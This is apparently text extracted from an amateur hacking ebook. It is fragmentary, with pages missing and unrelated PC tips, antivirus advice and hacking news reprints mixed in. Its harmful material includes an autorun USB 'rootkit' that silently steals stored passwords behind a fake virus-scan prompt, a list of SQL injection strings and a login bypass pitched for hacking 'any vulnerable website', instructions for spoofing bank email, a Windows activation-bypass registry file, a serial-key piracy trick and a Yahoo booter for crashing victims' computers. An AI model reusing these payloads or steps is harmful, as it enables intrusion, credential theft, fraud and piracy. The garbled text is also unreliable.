of course!! When user submits the orkut page, his ID and password
is mailed to orkut hacker and thus his orkut account is hacked.
93
How Hackers Send Fake Mails
Many time you see mails in your inbox like you HAVE WON
$100000 and the surprising thing there is that the mail address is
from banks like www.icici.com and www.sbi.co.in . So the
question arises how it can be possible to send mail to anyone with
others official email addresses.
There are many websites that can help to you send fake mails to
anyone ,here are some websites listed below
www.fakemailer.net
www.fakesend.com
www.deadfake.com
www.anonymailer.net
I like anonymailer.net and deadfake.com most . So here is example
I will send a mail myself with fake email address of Microsoft.com
94
Step1:- From Name:- Write any fake name like Bill Gates
Step2:- From E-mail:- Fake email from the email sent.
Step3:- To :- address whom you want to send mail
Step4:- Subject::- Its same like the Subject like yahoo,gmail.
95
How To Convert Pdf to Ms Word
Here is a software which can be help you to convert your PDF file
to word.doc .The software is which do this for you and FREE is
SolidConverter PDF. SolidConverter PDF is a flexible conversion
tool for converting all or part of Adobe® Acrobat® PDF files to a
Microsoft Word (DOC), rich text format (RTF) document, or plain
text. You can also use SolidConverter PDF to extract images from
a PDF file.
This document tells you how to convert a PDF using the fast
conversion method. Note that you can also quickly convert PDFs
directly from Microsoft Word or Windows Explorer.
You can open Solid Converter PDF using one of the following
methods:
96
Windows Start menu. From your Microsoft Windows Start
Programs menu, select Solid Documents|Solid Converter
PDF|Solid Converter PDF.
97
Continuous. Does not retain the exact layout of the document.
Correctly reconstructs the text order but will only recover paragraph
formatting, graphics, and text flow.
Exact. Uses Word text boxes to ensure that the text and graphic
layout in the Word document is the same as the PDF file. This mode
should not be used if you need to make lots of edits to the recovered
content
98
Step 5:- Select Page Range (Optional)
A message will display that will notify you when the conversion
is finished.
99
Hack Password Through USB Pendrive
100
IE Passview: IE PassView is a small utility that reveals the
passwords stored by Internet Explorer browser. It supports the new
Internet Explorer 7.0, as well as older versions of Internet explorer,
v4.0 - v6.0
101
[autorun]
open=launch.bat
3. Create another Notepad and write the following text onto it.
Now your rootkit is ready and you are all set to sniff the
passwords. You can use this pendrive on on any computer to sniff
the stored passwords. Just follow these steps
Step 1:- Insert the pendrive and the autorun window will pop-up.
102
(This is because, we have created an autorun pendrive).
Step 2:- In the pop-up window, select the first option (Perform a
Virus Scan).
Step 3:- Now all the password recovery tools will silently get
executed in the background (This process takes hardly a few
seconds). The passwords get stored in the .TXT files.
Step 4:- Remove the pendrive and you'll see the stored passwords
in the .TXT files.
103
How To Delete Your Recycle Bin
If you're like me, you appreciate the clean desktop that XP offers.
Unfortunately, one item remains: the Recycle Bin. You can't get
rid of it through any menus or anything like that. After much
hacking around in the registry, I finally found the responsible key.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\C
urrentVersio n\Explorer\Desktop\NameSpace\{645FF040-5081-
101B-9F08-00AA00 2F954E} and restart. When you restart, the
Recycle Bin is no longer on the desktop.
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\
Explorer\HideDesktopIcons\NewStartPanel
and change the value for {645FF040-5081-101B-9F08-
00AA002F954E}to 1
Rahul‟s Suggesion: -“Backup the key before you delete it, in case
you change your mind.”
104
Hacking PHP Site In Less Than A Minute
http://www.website.com:2000
and you will be comfortably login into admin page like this -
105
Now in the fields, you have to type -
username – admin
password – a‘ or 1=1 or ‗b
domain - a‘ or 1=1 or ‗b
106
Recover Gmail Accounts Through SMS
In order to access this feature, sign in to your account and select '
Change Password Recovery Options ' enter your cell phone
number and click ' Save '
107
The Next time you forget your password, enter your username on
the password-assistance page, and Google will text you a recovery
code. No need to check another email account or even leave the
page.
108
Tips From World‘s Top Most Antivirus Compay
1. Use plain old common sense. When in doubt, err of the side
of safety. Delete email attachments from people you don‘t
know (WITHOUT opening them!). Beware especially aware
of tempting animations on unprofessional-looking sites. Keep
an eye out for strange links or attachments in Instant
Messaging (IM) programs—they just might contain
malicious code.
2. Still use floppies? Scan them before use. This tip is
especially critical if you use floppy disks to transfer files
between PCs. Always scan them for viruses and other threats
before transferring their contents to any computer.
3. Label floppies—and don‟t share. Even well meaning
associates can unwittingly transmit viruses, worms, Trojan
horses or worse. Label your disks clearly, and ―neither a
borrower nor lender be.‖ Use alternate methods for sharing
files.
4. Never boot from floppy disks. This is one of the most
common ways viruses can be transmitted. Always remember
to remove inserted floppies before shutting down any PC;
otherwise, it will automatically attempt to boot from what
may already be a virus-laden disk.
5. Avoid downloading files of which you‟re unsure. Be on the
lookout for files such as freeware, screensavers, games or
other executable programs. Internet news groups and web
sites may be full of potential threats, so be sure to scan all
downloads before running them. It may be helpful to
download files to a ―Scan‖ folder and then scan the entire
folder‘s contents.
109
6. Frequently update your anti-virus software. Even the best
anti-virus software isn‘t much help unless you keep it
updated. New PC threats emerge daily—even hourly—and
variations can often be engineered to slip by previous
software versions. Most anti-virus software allows easy
online updating.
7. Protect system startups. Make sure to configure anti-virus
software to launch automatically and run constantly, ensuring
that you‘re always protected.
8. Scan incoming email/attachments. Again, you must scan
each attached file from email or IM messages—even those
from trusted sources. Most PC security software
automatically performs this function.
9. Don‟t automatically open email/attachments. This may
seem redundant, but it‘s important. Make sure your email
application doesn‘t automatically open messages (Check the
program‘s Options or Preferences menus).
10. Install professional anti-virus software — and keep
virus definitions up to date. Proper anti-virus and other PC
security applications can scan files for unusual changes and
other warning signs. This is by far the most important step
you can take to keep PCs as safe and secure as possible.
110
Hack To Set wallpaper In Pen Drive
Are you bored of viewing the same white background in your USB
pen drive, here is a trick where you can easily set colorful
wallpapers on your USB background.
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=hack.bmp
IconArea_Text=0×00000000
Copy and paste it in a notepad file, and specify the image file name
(here it is hack.bmp), then save it in your memory stick or pendrive
as desktop.ini also you are supposed to keep the image file on the
memory stick or your pendrive.
Refresh and view the background. Now every time when you open
your pendrive it will show background wallpaper.
111
Hack To Find Any Software Serial Key
Image by istockphoto
Ok, this is a little trick that i usually use to find cd keys with
Google.
Quite simple really. 94FBR is part of a Office 2000 Pro cd key that
is widely distributed as it bypasses the activation requirements of
Office 2K Pro. By searching for the product name and 94fbr, you
guarantee two things.
1)The pages that are returned are pages dealing specifically with
the product you're wantinga serial for.
Rahul‟s Suggesion: -“I hope this trick help you finding your cd
keys easily,you can try more key hacks to see more results. But still
I am in favour of Original Softwares buy original and play safe”
112
Amaze Your Friends By Yahoo Friend
Yahoo Friend is Yahoo! Messenger plugin that will make your
chatting more funny with a lot of cool emoticons and windows
effects
· With Yahoo! Friend, you can send very cool emoticons to your
friends and make them surprised!
· Your friends will always see your emoticons even they don't have
this software installed because it's all about the font, Wingdings
and Webdings - default fonts of Windows.
· You can hear the incoming messages from your friends now!!!
· Make your friends surprised with Auto Reply!!!
· With Yahoo! Friend, you can design and create your own
emoticons
113
How Hacker‘s Hide Files In Jpeg Pics
http://www.download3k.com/DownloadLink1-Mindhills-
International-Storm.html
114
Online Banking Tips From Rahul Tyagi
Online banking is the latest or should say fastest way for banking
these days. People go for online banking for money transfer and
more other purposes. But as online banking provides us great
features for banking in quite simple and fast way but along with
that it made very gud chances for hackers to steal money in a many
ways.
115
of Bank they enter there password and account no. As they click
on LOGIN. What happens the password along with account no
goes to hackers email address or in his server address. And as
simple hacker hacks the account transfer the money and your
like dumbo still watching and saying‖Hey bhagwan yeh kasie
ho gyaa‖.
116
GPRS Settings For All Mobile Networks
Get free GPRS settings for any operator/mobile in world on Your Mobile
Phone:
Most of people have face problems regarding gprs settings on their mobile
phones. I have been getting lots of mails about how to
configure and where to get gprs setting, So here are most of gprs
settings for most of mobile service operator (India). Here you have manual
gprs settings for vodafone, hutch,idea, airtel, bsnl, airtel live, airtel mobile
you can enter in your phone and configure.
117
* Account name: RTLMMS
* Access point name:MMS
* Homepage: http://10.114.0.5/mms/
* Wapgateway IP: 10.114.0.13
* Port: 9401
118
Proxy – Enabled/yes.
Proxy and Server address – 010.010.001.100
Proxy and Server Port – 9401 or 8080
Homepage – http://live.vodafone.in
Authentication Type – Normal
119
BPL gprs Settings:
Rahul‟s Suggesion: -“These settings may vary from city to city so check your area
but I recommend to first go for automatic setting from your network provider”
120
Introduction to Yahoo Booter
Yahoo booters are softwares that use packet codings to send the
victim‘s computer using yahoo messenger, these pack codes
contain some information and codes that computer can not
understand, so computer gets hanged or slowed down by
processing these packets, there r lots of different kinds of packets
created by programmers to boot yahoo users in different ays, like
disconnecting them from yahoo messenger and internet, or hanging
thier computer, or closing thier yahoo messenger or sending them
thousands of IM messages from different yahoo ids.Here is latest
Ybooter.
If your bot does not login, try to change your bots and password.
Login problem? Just make sure you copy and paste
VoodoEncrypt15.dll at your /system and /system32 folder.
121
10 Reasons Why Pc Crashes
1. Hardware conflict
2. Bad Ram
3. BIOS settings
122
Once inside the BIOS, great care should be taken. It is a good idea
to write down on a piece of paper all the settings that appear on the
screen. That way, if you change something and the computer
becomes more unstable, you will know what settings to revert to.
6. Viruses
7. Printers
123
8. Software
9. Overheating
One remedy is to get a bigger better fan and install it on top of the
CPU. Specialist cooling fans/heatsinks are available
from www.computernerd.com or www.coolit.com
With all the new construction going on around the country the
steady supply of electricity has become disrupted. A power surge
or spike can crash a computer as easily as a power cut.
124
Delete an Undeletable File In Windows
If you already know the path to the file, please skip to Step 7
3. Make sure the Look In box shows the correct drive letter
7. Click on Start, Run, and type CMD and Press Enter to open a
Command Prompt window
125
8. Leave the Command Prompt window open, but proceed to close
all other open programs
13. Now use the DEL command to delete the offending file. Type
DEL <filename> where <filename> is the file you wish to delete.
126
Get Orkut Scraps Through SMS
If you are thinking about, who written what in your Orkut Scrap
Book and if you don‘t have access of Internet, this problem can be
solved by getting all new Orkut Scraps in your mobile directly.
STEP 3. Open the gmail and set an option to filter and forward
your orkutscrap to your mobee.in emailID. Choose filter word
―orkut‖ . If you do it, a copy of filtered mail (orkut related) will be
sent to your mobee.in mail ID automatically.
127
How To Reset Your Lost Bios Password
Bios password are used to secure your desktop and latop computer
by preventing user from changing your bios setting or acessing to
your computer while u are away.there is too type of password
protection
the first one is bios setup protection:to prevent user from changing
bios setting
but sometime user can forget their password or even wrose they
can get infected by bios Backdoor verus.so sending back the unit
for reset bios is expensive here is some why how to recover or
remove u lost bios password
128
can risk of riuning your motherboard if u clear the cmos with
powered up motherboard .
4)the second way how to get the bios to default value is by
removing the battery .just remove it for 30 min the put it back
.again u must fully unplug any power cable during the
process
by Overloading the keyboard buffer.not always working but
should help in some case
The last way is toUse a professional service
129
Hack To Make Window Genuine
With this simple registry hack code you can make your Windows XPgenuine and get all the
updates from Microsoft. After this registry hack , even if you do validation of your copy you won't
get caught.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"ProductId"="55274-640-1011873-23081"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,\
31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a,a3,78,8e,8f,98,5c,00,00,\
00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00,00,00,00,00,00,00,b5,16,\
00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,66,e5,70,f3
"LicenseInfo"=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7c,c6,35,51,fd,52,57,17,86,3e,18,\
d3,f4,8c,8e,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9,9a,35,17,46,7a,4f,91,fc,\
4a,d9,db,64,5c,c4,e2,0f,34,f3,ea
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd
----------> save the file name with .REG extension coz its related to registry
----------> Change the Save as Type from Text Documents(*.txt) to All files
130
3. After saving, open it with Registry editor and your registry will be edited accordingly making
your windows XP genuine forever. (if it prompts for a confirmation to edit the registry choose
YES)
Try it yourself on your own risk and post in your valuable comments.
131
All SQL Injection Strings(Education Purpose Only)
These strings can be used to hack any vulnerable website having SQL at
backhand.
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
' or 'a'='a
" or "a"="a
') or ('a'='a
132
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Here are the strings through any vulnerable site can be hacked.
133
How To Remove New Folder Virus
What is Newfolder.exe?
The real name of this virus is Iddono. This threat copies its file(s)
to your hard disk. Its typical file name is Iddono. Then it creates
new startup key with name Iddono and value newfolder.exe. You
can also find it in your processes list with name newfolder.exe or
Iddono. This virus is very difficult to eliminate manually, but you
can find several possible methods of removal below.
Quick Solution:
True Sword will find and eliminate this problem and more than
447 908 other dangerous threats including trojans, spyware,
adware, riskware, problemware, keyloggers, dialers and other
kinds of malicious programs in several seconds. Fast, easy, and
handy, True Sword protects your computer against malicious
programs that do harm to your computer and break your privacy.
True Sword scans your hard disks and registry and destroys any
manifestation of such malicious programs. Standard anti-virus
software can do nothing against privacy breakers and malicious
programs like that. Get rid of trojans, spyware, adware, trackware,
dialers and keyloggers in one click now!
Download True Sword from www.ethicalhacking.do.am for free.
134
DLL's should be restored from distribution in case they are
corrupted by Iddono. To fix this threat, you should:
libedit.dll
newfolder.exe
shelliddono.dll
srv0104.ids
srvidd20.exe
Key: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
for nwiz.exe
Value: @
Key: software\microsoft\windows\currentversion\run\alchem
Value: @
Key: software\microsoft\windows\currentversion\run\zzb
Value: @
135
Recover Lost Data from The Sim Card
1. Free to download Data Doctor Recovery - Sim Card and install
it . Connect your sim card reader on port and insert sim card in it.
2. Click the Data Doctor Recovery - Sim Card desktop icon (or
select from the Windows programs list) to launch the product. The
initial screen (below) is displayed.
4. Select appropriate Com Port, Data Baud and Parity or you can
set the default setting. Then click "ok".
136
After this splash screen move. For Phone Book information Click
on the Phone Book icon. Then Click on Contact in Phone Book
Tree. This will show as below...
137
To Recover your deleted Sms click on Deleted on Tree. This will
display as.
You can also see the ASCII or Hex Value of selected phone
number or SMS by click on Ascii value and Hex value Tab Button.
ICC Identification
138
About Sim card data recovery software
Sim Card Data Recovery Software recovers your mobile
phone sim card accidentally deleted text SMS messages. Data
Doctor Sim Card Recovery Software is read only and non-
destructive utility restore all lost message. Utility retrieve all
deleted contact numbers (phone numbers), unreadable
messages, corrupt phone book directory.
139
How To Download Youtube Videos
140
the audio from the file). Using this site, you don't
Zamzar)
141
YouTubeX, as the name suggests, allows you to
format.
142
This site is a foreign site, but is easy to use and
143
Latest Hacking News Articles
144
and when he checked the results Monday morning at around 11:00 a.m. Eastern
Time, he found he was in Crystal’s account.
That’s when he realized that Crystal was a Twitter staffer, and he now had the
ability to access any other Twitter account by simply resetting an account
holder’s password through the administrative panel. He also realized he hadn’t
used a proxy to hide his IP address, potentially making him traceable. He said he
hadn’t used a proxy because he didn’t think the intrusion was important enough
to draw law-enforcement attention, and "didn’t think it would make headlines."
He said he decided not to use other hacked accounts personally. Instead he
posted a message to Digital Gangster, a forum for hackers and former hackers,
offering access to any Twitter account by request.
"I … threw the hack away by providing DG free accounts," he said.
He also posted a video he made of his hack to prove he had administrative
access to Twitter.
President-Elect Barack Obama was among the most popular requests from
Digital Gangster denizens, with around 20 members asking for access to the
election campaign account. After resetting the password for the account, he gave
the credentials to five people.
He also filled requests for access to Britney Spears’ account, as well as the
official feeds for Facebook, CBS News, Fox News and the accounts of CNN
correspondent Rick Sanchez and Digg founder Kevin Rose. Other targets
included additional news outlets and other celebrities. Fox won the hacker
popularity contest, beating out even Obama and Spears.
According to Twitter, 33 high-profile accounts were compromised in all.
GMZ doesn’t know what the reset passwords were, because Twitter resets them
randomly with a 12-character string of numbers and letters.
On Monday morning, the Twitter accounts belonging to Obama, Britney Spears,
FoxNews and others, begansending out bogus messages.
Someone used the Obama account to send out a message urging supporters to
click on a link to take a survey about the president-elect, and be eligible to win
$500 in gasoline. A fake message sent to followers of the Fox News Twitter feed
announced that
Fox host Bill O’Reilly "is gay," while a message from Britney Spears’
feed made lewd comments about the singer.
It was initially believed that the Twitter account hijackings were related to two
phishing scams that surfaced over the weekend. But GMZ’s hack was unrelated.
Shortly after GMZ posted his original message to Digital Gangster, the site’s
administrator deleted it, along with the responses from members asking for
access to other accounts. But a subsequent thread on the site supports GMZ’s
account of the hack.
GMZ said he didn’t access any of the high-profile accounts himself, and didn’t
send out any of the bogus tweets. He thinks he was in
Twitter a couple of hours before the company became aware of his access and
locked him out.
145
Twitter co-founder Biz Stone confirmed for Threat Level that the intruder had
used a dictionary attack to gain access to the administrative account, but
wouldn’t confirm the name of the employee who was hacked, or the password.
He also wouldn’t comment on how long the intruder was in the Twitter account
resetting passwords before he was discovered.
"Regarding your other questions, I’d feel more comfortable addressing them once
we’ve spoken to counsel because this is still ongoing," he wrote Threat Level in
an e-mail.
Stone said that Twitter has already been contacted by the Barack
Obama campaign about the hack and has been in touch with everyone whose
account was accessed by the intruders. He said Twitter had not had contact with
the FBI or any other law enforcement agency.
"We’re waiting to hear back from our lawyer about what our responsibilities are
about this and how to approach it," Stone said in a separate phone interview.
As for addressing the security issues that allowed the breach, he wrote in a
follow-up e-mail that the company is doing "a full security review on all access
points to Twitter. More immediately, we’re strengthening the security surrounding
sign-in. We’re also further restricting access to the support tools for added
security."
GMZ, who said he’s been hacking for about three years and is currently studying
game development, said he conducted the dictionary attack using a script he
wrote and used last November to break into the
YouTube account of teen queen Miley Cyrus.
That hack gained widespread attention when someone posted a video
memorial to Cyrus on the account, claiming Cyrus had died in a car accident.
GMZ said a friend of his was responsible for the hoax.
GMZ said he’s used the same dictionary attack to breach the SayNow accounts
of Disney star Selena Gomez and other celebrities.
After YouTube blocked his IP and patched some vulnerabilities he was
exploiting, he decided "for the fun of it (curiosity and self-entertainment) I’ll pen-
test Twitter." He was "shocked to realize that there was no rate limit" to lock
someone out after a specific number of failed password attempts.
He said he’d never even heard of Twitter until he saw someone mention it on
YouTube.
146
World‟s First iPhone Worm Hits iPhone Owners
In Australia
The attacks, which researchers say are the world‘s first iPhone
worm in the wild, target jailbroken iPhones that have
SSH software installed and keep Apple‘s default root password of
147
"alpine.‖ In addition to showing a well-coiffed picture of Astley,
the new wallpaper displays the message "ikee is never going to
give you up,‖ a play on Astley‘s saccharine addled 1987 hit "Never
Gonna Give You Up.‖
A review of some of the source code, shows that the malware, once
installed, searches the mobile phone network for other vulnerable
iPhones and when it finds one, copies itself to them using the the
default password and SSH, a Unix application also known as
secure shell. People posting to this thread on
Australian discussion forum Whirlpool first reported being hit on
Friday.
"I foolishly had forgot to change my root and user password last
time i had jailbroke my phone,‖ wrote one forum participant. In
addition to his own iPhone being attacked, he said a flatmate‘s
iPhone 3G was also sullied with the image of Astley. Users who
tried to delete the image were chagrined to find it reappear once
they rebooted their device.
The attack is a wakeup call for anyone who takes the time to
jailbreak an iPhone. While the hack greatly expands the
capabilities of the Apple smartphone, it can also make it more
vulnerable. Programs such as OpenSSH, which can only be
installed after iPhones have undergone the procedure, can be
extremely useful, but if owners haven‘t bothered to change their
root password, the programs also represent a gaping hole waiting
to be exploited.
"I was quite amazed by the number of people who didn‘t RTFM
and change their default passwords,‖ the unidentified worm writer
148
said. "I admit I probably pissed of [sic] a few people, but it was all
in good fun (well ok for me anyway).‖
Ikee said the worm disables the SSH daemon so it can‘t be targeted
further.
149
RockYou Hacked – 32 Million Account
Passwords Latest News
150
and kept it down until a security patch was in place. RockYou
confirms that no application accounts on Facebook were impacted
by this hack and that most of the accounts affected were for earlier
applications (including slideshow, glitter text, fun notes) that are
no longer formally supported by the company. RockYou has
secured the site and is in the process of informing all registered
users that the hack took place.‖ RockYou said it is planning to
notify users. As others have noted, 10 days after it learned of the
breach is far too late.
Source: DigitalBeat
151
All About Certified Ethical Hacker V6
Course
CEH v6.
152
The PassGuide leader among the providers of Ec-council ceh v6.0
preparatory materials is products such as Ec-council ceh v6.0 vce
pdf Braindumps, Ec-council ceh v6.0 Tutorial, Ec-council ceh v6.0
Exam Questions with Answers, Ec-council ceh v6.0
Trainings, Ec-council ceh v6.0 Test Online Simulations Course
and free PDF. It obtained its leadership and trust of the users from
the very beginning of its work on the Ec-council ceh v6.0 training
materials market. All the Ec-council ceh v6.0 value pack aids have
been created by people who are personally familiar with actualtests
Ec-council ceh v6.0 Preparation Labs and who know all the
difficulties and popular mistakes made by those who take a Ec-
council ceh v6.0 . The entire material is logically composed in
such a way that everything becomes easy to understand for
anyone. Full download Many Ec-council ceh v6.0 guides include
audio and video material. It is really easy to acquire Ec-council ceh
v6.0 exams because of great variety of methods of payment.
153
CEHv6 Module 16 Hacking Webservers
CEHv6 Module 17 Web Application Vulnerabilities
CEHv6 Module 18 Web based Password Cracking Techniques
CEHv6 Module 19 SQL Injection
CEHv6 Module 20 Hacking Wireless Networks
CEHv6 Module 21 Physical Security
CEHv6 Module 22 Linux Hacking
CEHv6 Module 23 Evading IDS Firewall and Honeypot
CEHv6 Module 24 Buffer Overflows
CEHv6 Module 25 Cryptography
CEHv6 Module 26 Penetration Testing
CEHv6 Module 28 Writing Virus Codes
CEHv6 Module 29 Assembly Language Tutorial
CEHv6 Module 30 Exploit Writing
CEHv6 Module 31 Exploit Writing
CEHv6 Module 32 Exploit Writing
CEHv6 Module 33 Reverse Engineering Techniques
CEHv6 Module 34 MAC OS X Hacking
CEHv6 Module 35 Hacking Routers, Cable Modems and Firewalls
CEHv6 Module 36 Hacking Mobile Phones, PDA
CEHv6 Module 37 Bluetooth Hacking
CEHv6 Module 38 VoIP Hacking
CEHv6 Module 39 RFID Hacking
CEHv6 Module 40 Spamming
CEHv6 Module 41 Hacking USB Devices
CEHv6 Module 42 Hacking Database Servers
CEHv6 Module 43 Cyber Warfare- Hacking Al-Qaida Terrorism
CEHv6 Module 44 Internet Content Filtering Techniques
CEHv6 Module 45 Privacy on the Internet
CEHv6 Module 46 Securing Laptop Computers
CEHv6 Module 47 Spying Technologies
CEHv6 Module 48 Corporate Espionage by Insiders
CEHv6 Module 49 Creating Security Policies
CEHv6 Module 50 Software Piracy and Warez
CEHv6 Module 51 Hacking and Cheating Online Games
154
CEHv6 Module 52 Hacking RSS and Atom
CEHv6 Module 53 Hacking Web Browsers
CEHv6 Module 54 Proxy Server Technologies
CEHv6 Module 55 Preventing Data Loss
CEHv6 Module 56 Hacking Global Positioning System
CEHv6 Module 57 Computer Forensics and Incident Handling
CEHv6 Module 58 Credit Card Frauds
CEHv6 Module 59 How to Steal Passwords
CEHv6 Module 60 Firewall Technologies
CEHv6 Module 61 Threats and Countermeasures
CEHv6 Module 62 Case Studies
CEHv6 Module 63 Botnets
CEHv6 Module 64 Economic Espionage
CEHv6 Module 65 Patch Management
CEHv6 Module 66 Security Convergence
CEHv6 Module 67 Identifying the Terrorists
155
CONCLUSION
www.ethicalhacking.do.am
Various www.blogspot.com Blogs
www.google.com
www.wikipedia.com
www.security-focus.com
www.milw0rm.com
www.the-register.com
www.insecure.org
156